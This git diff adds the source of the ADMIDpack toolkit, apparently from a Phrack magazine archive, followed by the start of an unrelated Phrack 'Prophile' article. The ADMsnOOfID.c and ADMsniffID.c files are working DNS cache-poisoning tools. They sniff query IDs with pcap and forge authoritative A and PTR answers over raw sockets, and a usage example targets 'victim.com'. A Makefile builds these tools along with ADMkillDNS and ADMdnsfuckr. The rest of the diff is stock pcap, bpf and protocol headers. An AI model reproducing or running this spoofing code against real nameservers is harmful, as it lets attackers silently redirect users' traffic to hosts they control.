+<++> ADMIDpack/ADMsnOOfID.c
+#include "ADM-spoof.c"
+#include "dns.h"
+#include "ADMDNS2.c"
+#include <pcap.h>
+#include <net/if.h>
+
+#define  DNSHDRSIZE 12
+#define  SPOOF      "127.0.0.1"       
+#define  VERSION    "ver 0.6 pub"
+#define  ERROR      -1
+
+int ETHHDRSIZE;
+                     
+void main(argc, argv)
+int argc;
+char *argv[];
+   {
+   struct pcap_pkthdr h;
+   struct pcap *pcap_d;
+      	 struct   iphdr  *ip;
+	 struct   udphdr *udp;
+	 struct   dnshdr *dnsrecv,*dnssend;
+	 char            *data;
+	 char            *data2;
+	 char            *buffer;
+         char            namefake[255];
+         char            buffer2[1024];
+	 char            ebuf[255];
+	 char            spoofname[255];
+	 char            spoofip[255];
+	 char            bla[255];
+	 char            dnstrust[255];
+	 char            *alacon;
+	 unsigned long   s_ipns;
+	 unsigned long   d_ip;                     
+	 
+	 int  sraw, i, on=1, con, ID,DA_ID,type;
+
+srand( (time(NULL) % random() * random()) );
+
+
+if(argc <2){
+  printf("usage : %s <device> <ns.victim.com> <your domain> <IP of ur NS> <type 1,12> <spoofname> <spoof ip> <ns trust> \n",argv[0]); 
+  printf("ex: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr  \n",argv[0]);
+  printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. now if som1 asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n"); 
+  exit(0);
+  }
+
+if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
+ else ETHHDRSIZE = 14;
+
+if(argc>5)type=atoi(argv[5]);
+
+
+if(argc > 6)strcpy(spoofname,argv[6]);
+ else{
+  printf("enter the name you wanna spoof:");
+  scanf("%s",spoofname);
+ }
+ 
+ if(argc > 7)strcpy(bla,argv[7]);
+ else{
+      printf("enter the ip's  of the spoof name:");
+      scanf("%s",bla);
+    }
+                               
+ alacon =(char *)inet_ntoa(host2ip(bla));
+ strcpy(spoofip,alacon);
+                                   
+if(argc > 8)strcpy(bla,argv[8]);
+else{
+    printf("enter the dns trust for the spoof\n");
+    scanf("%s",bla);
+    }
+  alacon =(char *)inet_ntoa(host2ip(bla));
+  strcpy(dnstrust,alacon);
+   
+ 
+ dnssend = (struct dnshdr  *)buffer2;
+ data2   = (char *)(buffer2+DNSHDRSIZE);
+
+ bzero(buffer2,sizeof(buffer2));
+   
+   
+if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
+  perror("socket");
+  exit(ERROR);
+  }
+  
+if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
+ perror("setsockopt");
+ exit(ERROR);
+ }
+ 
+ printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION);
+ printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n");
+ sleep(1);
+ 
+ pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf);
+
+s_ipns = host2ip(argv[4]);
+d_ip   = host2ip(argv[2]);
+con    = myrand();
+
+/* make the question for get the ID */
+
+sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]); 
+dnssend->id      = 2600;
+dnssend->qr      = 0;
+dnssend->rd      = 1;
+dnssend->aa      = 0;
+dnssend->que_num = htons(1);
+dnssend->rep_num = htons(0);
+i = makepaketQS(data2,namefake,TYPE_A);
+udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i);
+printf("Question sended...\n");                                                                
+printf("Its Time to w8 \n");
+
+while(1)
+{ 
+  buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */  
+  
+  ip      = (struct iphdr   *)(buffer+ETHHDRSIZE);
+  udp     = (struct udphdr  *)(buffer+ETHHDRSIZE+IPHDRSIZE);
+  dnsrecv = (struct dnshdr  *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
+  data    = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);
+
+if(ip->protocol == IPPROTO_UDP){
+printf("[%s:%i ->",inet_ntoa(ip->saddr),ntohs(udp->source));
+printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest));
+}
+
+    if(ip->protocol == 17 )     
+      if(ip->saddr.s_addr  == d_ip )
+        if(ip->daddr.s_addr == s_ipns ) 
+          if(udp->dest  == htons(53) )
+            if(dnsrecv->qr == 0 )
+             {
+             printf("kewl :)~ we have the packet !\n");
+             
+             ID = dnsrecv->id ;    /* we get the id         */
+             
+             printf("the current id of %s is %d \n",argv[2],ntohs(ID));
+             
+             DA_ID = ntohs(ID);
+           
+    
+             printf("send the spoof...\n");
+            
+             dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type); 
+           
+             printf("spoof sended...\n");
+            
+             exit(0);
+            }    
+      
+      
+ 
+  }
+ 
+  /* well now we have the ID we cant predict the ID */ 
+ 
+ }
+<-->
+<++> ADMIDpack/ADMsniffID.c
+
+#include <pcap.h>
+
+#include "ADM-spoof.c"
+#include "dns.h"
+#include "ADMDNS2.c"
+
+#define  ERROR	    -1                
+#define  DNSHDRSIZE 12    
+#define  VERSION    "ver 0.4 pub" 
+
+int ETHHDRSIZE;
+
+void usage(){
+ printf("usage : ADMsniffID <device> <IP> <name> <type of spoof[1,12]> \n");
+ printf("ex: ADMsniffID eth0 \"127.0.0.1\" \"www.its.me.com\" \n");
+ exit(ERROR);
+}       
+                     
+void main(int argc, char **argv)
+   {     
+   struct pcap_pkthdr h;
+   struct pcap *pcap_d;
+	 struct   iphdr  *ip;
+	 struct   udphdr *udp;
+	 struct   dnshdr *dnsrecv,*dnssend;
+	 char            *data;
+	 char            *data2;
+	 char            *buffer;
+         char            SPOOFIP[255];
+         char            bla[255];
+         char            spoofname[255];
+         char            tmp2[255];
+         char            ebuf[255];
+         char            buffer2[1024];    
+         unsigned char   namez[255];                          
+	 int sraw,on=1,tmp1,type;
+
+
+if(argc <2)usage();
+if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
+  else ETHHDRSIZE = 14; 
+	
+strcpy(SPOOFIP,argv[2]);
+strcpy(spoofname,argv[3]);
+type = atoi(argv[4]);
+  
+/* Buffer 'n' tcp/ip stuff */
+ 
+ dnssend = (struct dnshdr  *)buffer2;
+ data2   = (char *)(buffer2+12);
+
+ 
+ 
+ /* bzero(buffer,sizeof(buffer));          */
+ bzero(bla,sizeof(bla));
+ bzero(buffer2,sizeof(buffer2));
+   
+  
+if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
+    perror("socket");
+    exit(ERROR);
+    }
+
+if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
+  perror("setsockopt");
+  exit(ERROR);
+  }    
+ 
+ /* open pcap descriptor */
+ 
+ pcap_d = pcap_open_live(argv[1],sizeof(buffer),0,100,ebuf);
+        
+printf("ADMsniffID %s (c) ADMnHeike\n",VERSION);
+
+while(1){    
+ 
+ buffer =(u_char *)pcap_next(pcap_d,&h); /* catch the packet */
+  
+    
+ ip      = (struct iphdr   *)(buffer+ETHHDRSIZE);
+ udp     = (struct udphdr  *)(buffer+ETHHDRSIZE+IPHDRSIZE);
+ dnsrecv = (struct dnshdr  *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
+ data    = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);
+
+ if(ip->protocol == 17)
+  if(udp->dest == htons(53) )    
+    if(dnsrecv->qr == 0)
+      {
+     strcpy(namez,data); 
+     nameformat(namez,bla);
+     printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla); 
+             
+     bzero(bla,sizeof(bla));
+     printf("the question have the type %i and type of the query %i\n"
+            ,ntohs(*((u_short *)(data+strlen(data)+1)))
+            ,ntohs(*((u_short *)(data+strlen(data)+2+1))));
+    
+     /* well in diz version we only spoof  the type 'A'       */
+     /* check out for a new version in ftp.janova.org/pub/ADM */
+       
+   
+     printf("make the spoof packet...\n");
+     printf("dns header\n");  
+
+     /* here we gonna start to make the spoofed paket :)*/
+       
+       memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5);
+       
+       dnssend->id=dnsrecv->id;         /* haha the ID ;)     */   
+       dnssend->aa=1;  		        /* i've the authority */ 
+       dnssend->ra=1;                   /* i've the recusion  */
+       dnssend->qr=1;                   /* its a awser        */
+       dnssend->rep_num = htons(1);     /* i've one awnser    */
+
+            
+     printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n"
+            ,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num));  
+     printf("Question..\n");
+     printf("domainename=%s\n",data2);
+     printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1))));
+     printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2))));
+     
+      if( type ==   TYPE_PTR){ 
+        tmp1=strlen(namez)+5;
+        strcpy(data2+tmp1,namez);
+        tmp1=tmp1+strlen(namez)+1;                            
+        
+        bzero(tmp2,sizeof(tmp2));
+        nameformat(spoofname,tmp2); 
+        printf("tmp2 = %s\n",tmp2);
+     
+      
+      printf(" mouhahahah \n");
+      *((u_short  *)(data2+tmp1)) = htons(TYPE_PTR);   
+      *((u_short  *)(data2+tmp1+2))       = htons(1);
+      *((u_long *)(data2+tmp1+2+2))       = htonl(86400);
+      *((u_short  *)(data2+tmp1+2+2+4))   = htons(strlen((tmp2)+1));
+      printf("bhaa?.\n");
+      strcpy((data2+tmp1+2+2+4+2),tmp2);
+      printf(" ouf !! =) \n");
+      tmp1 = tmp1 +strlen(tmp2)+ 1;
+   
+    }
+      
+      if( type  == TYPE_A){
+      tmp1=strlen(namez)+5;
+      strcpy(data2+tmp1,namez);
+      tmp1=tmp1+strlen(namez)+1;
+      *((u_short  *)(data2+tmp1))         = htons(TYPE_A);
+      *((u_short  *)(data2+tmp1+2))       = htons(1);
+      *((u_long *)(data2+tmp1+2+2))       = htonl(86400);      
+      *((u_short  *)(data2+tmp1+2+2+4))   = htons(4);
+      *((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFIP);
+                  
+      }
+                        
+    printf("Answer..\n");
+    printf("domainname=%s\n",tmp2);
+    printf("type=%i\n",ntohs(*((u_short  *)(data2+tmp1))));
+    printf("classe=%i\n",ntohs(*((u_short  *)(data2+tmp1+2))));
+    printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2))));
+    printf("resource data lenght=%i\n",ntohs(*((u_short  *)(data2+tmp1+2+2+4))));
+    printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2))));
+    
+    tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */
+    			 /* without the dnshdr                         */
+          
+      
+      udp_send(sraw
+              ,ip->daddr
+              ,ip->saddr
+              ,ntohs(udp->dest)
+              ,ntohs(udp->source)
+              ,buffer2
+              ,DNSHDRSIZE+tmp1);
+           } /* end of the spoof             */           
+  } /* end of while(1)                     */
+} /* The End !! ;)                        */
+<-->
+<++> ADMIDpack/Makefile
+# version 0.1
+#/usr/contrib/bin/gcc -L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkillDNS 
+SHELL  = /bin/sh
+# uncomment this if your are not on LinuX
+#LIBS   = -lsocket -lnsl -lpcap
+#
+CC = gcc
+LIBS = -lpcap
+BIN = .
+CFLAGS = -I. -L.  
+all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00d
+
+ADMkillDNS: ADMkillDNS.c
+	$(CC) $(CFLAGS) ADMkillDNS.c  $(LIBS) -o $(BIN)/ADMkillDNS 
+
+ADMsnOOfID: ADMsnOOfID.c
+	$(CC) $(CFLAGS) ADMsnOOfID.c  $(LIBS) -o $(BIN)/ADMsnOOfID 
+
+ADMsniffID: ADMsniffID.c
+	$(CC) $(CFLAGS) ADMsniffID.c  $(LIBS) -o $(BIN)/ADMsniffID 
+
+ADMdnsfuckr: ADMdnsfuckr.c
+	$(CC) $(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN)/ADMdnsfuckr  
+
+ADMnOg00d: ADMnOg00d.c
+	$(CC) $(CFLAGS) ADMnOg00d.c   $(LIBS) -o $(BIN)/ADMnOg00d   
+
+clean:
+	rm -f $(BIN)/*o $(BIN)/ADMsniffID $(BIN)/ADMsnOOfID $(BIN)/ADMnOg00d \
+	$(BIN)/ADMkillDNS $(BIN)/ADMdnsfuckr
+<-->
+<++> ADMIDpack/bpf.h
+/*-
+ * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
+ *	The Regents of the University of California.  All rights reserved.
+ *
+ * This code is derived from the Stanford/CMU enet packet filter,
+ * (net/enet.c) distributed as part of 4.3BSD, and code contributed
+ * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence 
+ * Berkeley Laboratory.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by the University of
+ *      California, Berkeley and its contributors.
+ * 4. Neither the name of the University nor the names of its contributors
+ *    may be used to endorse or promote products derived from this software
+ *    without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *      @(#)bpf.h       7.1 (Berkeley) 5/7/91
+ *
+ * @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
+ */
+
+#ifndef BPF_MAJOR_VERSION
+
+/* BSD style release date */
+#define BPF_RELEASE 199606
+
+typedef	int bpf_int32;
+typedef	u_int bpf_u_int32;
+
+/*
+ * Alignment macros.  BPF_WORDALIGN rounds up to the next 
+ * even multiple of BPF_ALIGNMENT. 
+ */
+#define BPF_ALIGNMENT sizeof(bpf_int32)
+#define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1))
+
+#define BPF_MAXINSNS 512
+#define BPF_MAXBUFSIZE 0x8000
+#define BPF_MINBUFSIZE 32
+
+/*
+ *  Structure for BIOCSETF.
+ */
+struct bpf_program {
+	u_int bf_len;
+	struct bpf_insn *bf_insns;
+};
+ 
+/*
+ * Struct returned by BIOCGSTATS.
+ */
+struct bpf_stat {
+	u_int bs_recv;		/* number of packets received */
+	u_int bs_drop;		/* number of packets dropped */
+};
+
+/*
+ * Struct return by BIOCVERSION.  This represents the version number of 
+ * the filter language described by the instruction encodings below.
+ * bpf understands a program iff kernel_major == filter_major &&
+ * kernel_minor >= filter_minor, that is, if the value returned by the
+ * running kernel has the same major number and a minor number equal
+ * equal to or less than the filter being downloaded.  Otherwise, the
+ * results are undefined, meaning an error may be returned or packets
+ * may be accepted haphazardly.
+ * It has nothing to do with the source code version.
+ */
+struct bpf_version {
+	u_short bv_major;
+	u_short bv_minor;
+};
+/* Current version number of filter architecture. */
+#define BPF_MAJOR_VERSION 1
+#define BPF_MINOR_VERSION 1
+
+/*
+ * BPF ioctls
+ *
+ * The first set is for compatibility with Sun's pcc style
+ * header files.  If your using gcc, we assume that you
+ * have run fixincludes so the latter set should work.
+ */
+#if (defined(sun) || defined(ibm032)) && !defined(__GNUC__)
+#define	BIOCGBLEN	_IOR(B,102, u_int)
+#define	BIOCSBLEN	_IOWR(B,102, u_int)
+#define	BIOCSETF	_IOW(B,103, struct bpf_program)
+#define	BIOCFLUSH	_IO(B,104)
+#define BIOCPROMISC	_IO(B,105)
+#define	BIOCGDLT	_IOR(B,106, u_int)
+#define BIOCGETIF	_IOR(B,107, struct ifreq)
+#define BIOCSETIF	_IOW(B,108, struct ifreq)
+#define BIOCSRTIMEOUT	_IOW(B,109, struct timeval)
+#define BIOCGRTIMEOUT	_IOR(B,110, struct timeval)
+#define BIOCGSTATS	_IOR(B,111, struct bpf_stat)
+#define BIOCIMMEDIATE	_IOW(B,112, u_int)
+#define BIOCVERSION	_IOR(B,113, struct bpf_version)
+#define BIOCSTCPF	_IOW(B,114, struct bpf_program)
+#define BIOCSUDPF	_IOW(B,115, struct bpf_program)
+#else
+#define	BIOCGBLEN	_IOR('B',102, u_int)
+#define	BIOCSBLEN	_IOWR('B',102, u_int)
+#define	BIOCSETF	_IOW('B',103, struct bpf_program)
+#define	BIOCFLUSH	_IO('B',104)
+#define BIOCPROMISC	_IO('B',105)
+#define	BIOCGDLT	_IOR('B',106, u_int)
+#define BIOCGETIF	_IOR('B',107, struct ifreq)
+#define BIOCSETIF	_IOW('B',108, struct ifreq)
+#define BIOCSRTIMEOUT	_IOW('B',109, struct timeval)
+#define BIOCGRTIMEOUT	_IOR('B',110, struct timeval)
+#define BIOCGSTATS	_IOR('B',111, struct bpf_stat)
+#define BIOCIMMEDIATE	_IOW('B',112, u_int)
+#define BIOCVERSION	_IOR('B',113, struct bpf_version)
+#define BIOCSTCPF	_IOW('B',114, struct bpf_program)
+#define BIOCSUDPF	_IOW('B',115, struct bpf_program)
+#endif
+
+/*
+ * Structure prepended to each packet.
+ */
+struct bpf_hdr {
+	struct timeval	bh_tstamp;	/* time stamp */
+	bpf_u_int32	bh_caplen;	/* length of captured portion */
+	bpf_u_int32	bh_datalen;	/* original length of packet */
+	u_short		bh_hdrlen;	/* length of bpf header (this struct
+					   plus alignment padding) */
+};
+/*
+ * Because the structure above is not a multiple of 4 bytes, some compilers
+ * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work.
+ * Only the kernel needs to know about it; applications use bh_hdrlen.
+ */
+#ifdef KERNEL
+#define SIZEOF_BPF_HDR 18
+#endif
+
+/*
+ * Data-link level type codes.
+ */
+#define DLT_NULL	0	/* no link-layer encapsulation */
+#define DLT_EN10MB	1	/* Ethernet (10Mb) */
+#define DLT_EN3MB	2	/* Experimental Ethernet (3Mb) */
+#define DLT_AX25	3	/* Amateur Radio AX.25 */
+#define DLT_PRONET	4	/* Proteon ProNET Token Ring */
+#define DLT_CHAOS	5	/* Chaos */
+#define DLT_IEEE802	6	/* IEEE 802 Networks */
+#define DLT_ARCNET	7	/* ARCNET */
+#define DLT_SLIP	8	/* Serial Line IP */
+#define DLT_PPP		9	/* Point-to-point Protocol */
+#define DLT_FDDI	10	/* FDDI */
+#define DLT_ATM_RFC1483	11	/* LLC/SNAP encapsulated atm */
+#define DLT_RAW		12	/* raw IP */
+#define DLT_SLIP_BSDOS	13	/* BSD/OS Serial Line IP */
+#define DLT_PPP_BSDOS	14	/* BSD/OS Point-to-point Protocol */
+
+/*
+ * The instruction encondings.
+ */
+/* instruction classes */
+#define BPF_CLASS(code) ((code) & 0x07)
+#define		BPF_LD		0x00
+#define		BPF_LDX		0x01
+#define		BPF_ST		0x02
+#define		BPF_STX		0x03
+#define		BPF_ALU		0x04
+#define		BPF_JMP		0x05
+#define		BPF_RET		0x06
+#define		BPF_MISC	0x07
+
+/* ld/ldx fields */
+#define BPF_SIZE(code)	((code) & 0x18)
+#define		BPF_W		0x00
+#define		BPF_H		0x08
+#define		BPF_B		0x10
+#define BPF_MODE(code)	((code) & 0xe0)
+#define		BPF_IMM 	0x00
+#define		BPF_ABS		0x20
+#define		BPF_IND		0x40
+#define		BPF_MEM		0x60
+#define		BPF_LEN		0x80
+#define		BPF_MSH		0xa0
+
+/* alu/jmp fields */
+#define BPF_OP(code)	((code) & 0xf0)
+#define		BPF_ADD		0x00
+#define		BPF_SUB		0x10
+#define		BPF_MUL		0x20
+#define		BPF_DIV		0x30
+#define		BPF_OR		0x40
+#define		BPF_AND		0x50
+#define		BPF_LSH		0x60
+#define		BPF_RSH		0x70
+#define		BPF_NEG		0x80
+#define		BPF_JA		0x00
+#define		BPF_JEQ		0x10
+#define		BPF_JGT		0x20
+#define		BPF_JGE		0x30
+#define		BPF_JSET	0x40
+#define BPF_SRC(code)	((code) & 0x08)
+#define		BPF_K		0x00
+#define		BPF_X		0x08
+
+/* ret - BPF_K and BPF_X also apply */
+#define BPF_RVAL(code)	((code) & 0x18)
+#define		BPF_A		0x10
+
+/* misc */
+#define BPF_MISCOP(code) ((code) & 0xf8)
+#define		BPF_TAX		0x00
+#define		BPF_TXA		0x80
+
+/*
+ * The instruction data structure.
+ */
+struct bpf_insn {
+	u_short	code;
+	u_char 	jt;
+	u_char 	jf;
+	bpf_int32 k;
+};
+
+/*
+ * Macros for insn array initializers.
+ */
+#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }
+#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }
+
+#ifdef KERNEL
+extern u_int bpf_filter();
+extern void bpfattach();
+extern void bpf_tap();
+extern void bpf_mtap();
+#else
+#if __STDC__
+extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
+#endif
+#endif
+
+/*
+ * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST).
+ */
+#define BPF_MEMWORDS 16
+
+#endif
+<-->
+<++> ADMIDpack/dns.h
+
+#define DNSHDRSIZE 12
+   
+struct dnshdr {
+unsigned short int id;
+
+unsigned char  rd:1;           /* recursion desired */
+unsigned char  tc:1;           /* truncated message */
+unsigned char  aa:1;           /* authoritive answer */
+unsigned char  opcode:4;       /* purpose of message */
+unsigned char  qr:1;           /* response flag */
+
+unsigned char  rcode:4;        /* response code */
+unsigned char  unused:2;       /* unused bits */
+unsigned char  pr:1;           /* primary server required (non standard) */
+unsigned char  ra:1;           /* recursion available */
+
+unsigned short int que_num;
+unsigned short int rep_num;
+unsigned short int num_rr;
+unsigned short int num_rrsup;
+};
+<-->
+<++> ADMIDpack/ip.h
+
+/* adapted from tcpdump */
+
+#ifndef IPVERSION
+  #define IPVERSION 4
+#endif  /* IPVERISON */
+
+struct iphdr {
+  u_char  ihl:4,	/* header length */
+          version:4;	/* version */
+  u_char  tos;		/* type of service */
+  short   tot_len;	/* total length */
+  u_short id;		/* identification */
+  short   off;		/* fragment offset field */
+#define IP_DF   0x4000	/* dont fragment flag */
+#define IP_MF   0x2000	/* more fragments flag */
+  u_char  ttl;		/* time to live */
+  u_char  protocol;	/* protocol */
+  u_short check;	/* checksum */
+  struct  in_addr saddr, daddr;  /* source and dest address */
+};
+
+#ifndef IP_MAXPACKET
+  #define IP_MAXPACKET 65535
+#endif  /* IP_MAXPACKET */
+<-->
+<++> ADMIDpack/pcap.h
+/*
+ * Copyright (c) 1993, 1994, 1995, 1996, 1997
+ *	The Regents of the University of California.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *	This product includes software developed by the Computer Systems
+ *	Engineering Group at Lawrence Berkeley Laboratory.
+ * 4. Neither the name of the University nor of the Laboratory may be used
+ *    to endorse or promote products derived from this software without
+ *    specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL)
+ */
+
+#ifndef lib_pcap_h
+#define lib_pcap_h
+
+#include <sys/types.h>
+#include <sys/time.h>
+
+#include <bpf.h>
+
+#include <stdio.h>
+
+#define PCAP_VERSION_MAJOR 2
+#define PCAP_VERSION_MINOR 4
+
+#define PCAP_ERRBUF_SIZE 256
+
+/*
+ * Compatibility for systems that have a bpf.h that
+ * predates the bpf typedefs for 64-bit support.
+ */
+#if BPF_RELEASE - 0 < 199406
+typedef	int bpf_int32;
+typedef	u_int bpf_u_int32;
+#endif
+
+typedef struct pcap pcap_t;
+typedef struct pcap_dumper pcap_dumper_t;
+
+/*
+ * The first record in the file contains saved values for some
+ * of the flags used in the printout phases of tcpdump.
+ * Many fields here are 32 bit ints so compilers won't insert unwanted
+ * padding; these files need to be interchangeable across architectures.
+ */
+struct pcap_file_header {
+	bpf_u_int32 magic;
+	u_short version_major;
+	u_short version_minor;
+	bpf_int32 thiszone;	/* gmt to local correction */
+	bpf_u_int32 sigfigs;	/* accuracy of timestamps */
+	bpf_u_int32 snaplen;	/* max length saved portion of each pkt */
+	bpf_u_int32 linktype;	/* data link type (DLT_*) */
+};
+
+/*
+ * Each packet in the dump file is prepended with this generic header.
+ * This gets around the problem of different headers for different
+ * packet interfaces.
+ */
+struct pcap_pkthdr {
+	struct timeval ts;	/* time stamp */
+	bpf_u_int32 caplen;	/* length of portion present */
+	bpf_u_int32 len;	/* length this packet (off wire) */
+};
+
+/*
+ * As returned by the pcap_stats()
+ */
+struct pcap_stat {
+	u_int ps_recv;		/* number of packets received */
+	u_int ps_drop;		/* number of packets dropped */
+	u_int ps_ifdrop;	/* drops by interface XXX not yet supported */
+};
+
+typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
+			     const u_char *);
+
+char	*pcap_lookupdev(char *);
+int	pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
+pcap_t	*pcap_open_live(char *, int, int, int, char *);
+pcap_t	*pcap_open_offline(const char *, char *);
+void	pcap_close(pcap_t *);
+int	pcap_loop(pcap_t *, int, pcap_handler, u_char *);
+int	pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
+const u_char*
+	pcap_next(pcap_t *, struct pcap_pkthdr *);
+int	pcap_stats(pcap_t *, struct pcap_stat *);
+int	pcap_setfilter(pcap_t *, struct bpf_program *);
+void	pcap_perror(pcap_t *, char *);
+char	*pcap_strerror(int);
+char	*pcap_geterr(pcap_t *);
+int	pcap_compile(pcap_t *, struct bpf_program *, char *, int,
+	    bpf_u_int32);
+/* XXX */
+int	pcap_freecode(pcap_t *, struct bpf_program *);
+int	pcap_datalink(pcap_t *);
+int	pcap_snapshot(pcap_t *);
+int	pcap_is_swapped(pcap_t *);
+int	pcap_major_version(pcap_t *);
+int	pcap_minor_version(pcap_t *);
+
+/* XXX */
+FILE	*pcap_file(pcap_t *);
+int	pcap_fileno(pcap_t *);
+
+pcap_dumper_t *pcap_dump_open(pcap_t *, const char *);
+void	pcap_dump_close(pcap_dumper_t *);
+void	pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);
+
+/* XXX this guy lives in the bpf tree */
+u_int	bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
+char	*bpf_image(struct bpf_insn *, int);
+#endif
+<-->
+<++> ADMIDpack/udp.h
+struct udphdr {
+	u_short source;		/* source port */
+	u_short dest;			/* destination port */
+	u_short	len;			/* udp length */
+	u_short check;		/* udp checksum */
+};
+<-->
+
+----[  EOF
diff --git a/phrack52/4.txt b/phrack52/4.txt
new file mode 100644
index 0000000..40b582b
--- /dev/null
+++ b/phrack52/4.txt
@@ -0,0 +1,133 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 04 of 20
+
+
+-------------------------[  P H R A C K     5 2     P R O P H I L E
+
+
+----------------[  Personal
+
+
+             Handle: O0
+           Call him: pachuco. Hey... me.
+       Past handles: digital jesus
